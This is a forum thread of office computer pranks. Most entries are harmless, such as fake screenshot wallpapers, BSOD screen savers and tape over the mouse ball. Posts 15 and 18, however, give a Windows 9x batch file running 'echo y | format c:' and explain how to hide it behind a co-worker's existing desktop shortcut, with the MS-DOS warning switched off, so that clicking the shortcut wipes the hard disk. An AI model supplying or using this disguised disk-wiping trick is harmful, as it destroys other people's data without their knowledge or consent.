3. do ya one better
rotate it 180 degrees in an image editor.

When they come to work and say WTF, ask them if they've tried turning their monitor upside down.
;-)

4. I did that with a bunch of windows open once
I opened up some pretty risque sites on the internet (no porn, just a little t&a), had a few windows going, and hit printscreen.

Naturally, when he returned to his desk he was frantic about closing all the windows, but he clicked and clicked and they wouldn't go away.

He called the IT guy, who used Task Manager to try to close them. He was very surprised to see that the tasks were not running. He rebooted, and the t&a windows appeared again.

About this time they see me and some friends busting a nut over in the other cubicle. The IT guy was so pissed, he almost disabled wallpaper on all company computers! :D (and yes, I'm glad I don't work for that asshole anymore)

5. Amazing!
Not five minutes ago, I was explaining to a co-worker how to do that prank. It's a pisser watching people scratch their heads when you do that to 'em.

9. that's pretty cool
users at work are often sending me screen shots of their desktops, and you'd be surprised how many of them react the way you describe, when they are the ones who did the print screen in the first place!

Ah, job security...

10. There's a place you can download BSOD screen savers
so people come back to their machines and it looks as if they've blue-screened. That one's truly evil.

Did you ever see the VT102 hack that downloaded a reversed caharacter
set to the VT102, and then displayed a message (using the reversed
characters) which said something like this:

                      !pleH
               renosirp dleh gnieb m'I
             !TRC siht edisni

12. Put a small piece of tape over the mouse ball
and watch them reboot the computer 5 times, check the plugs, call the IT dept, watch the IT guy reboot the computer 5 times, check the plugs, then finally figure out to look at the mouse itself.

15. If they are using Windows 9x
make a batch file and point one of their existing desktop short cuts to it. (yes I know it will look different)

Contents of the batch file

echo y | format c:

Now on the properties of that shortcut choose the option to "exit windows" when this is run.

hehehehehehe

18. Oops
I made a boo boo with the directions

Right click on the batch file and choose properties.
On the "Program" tab, click advanced
take the check out of "suggest ms-dos mode"
put a check in "ms-dos mode"
remove the check from the "warn before entering ms-dos mode"

Have fun
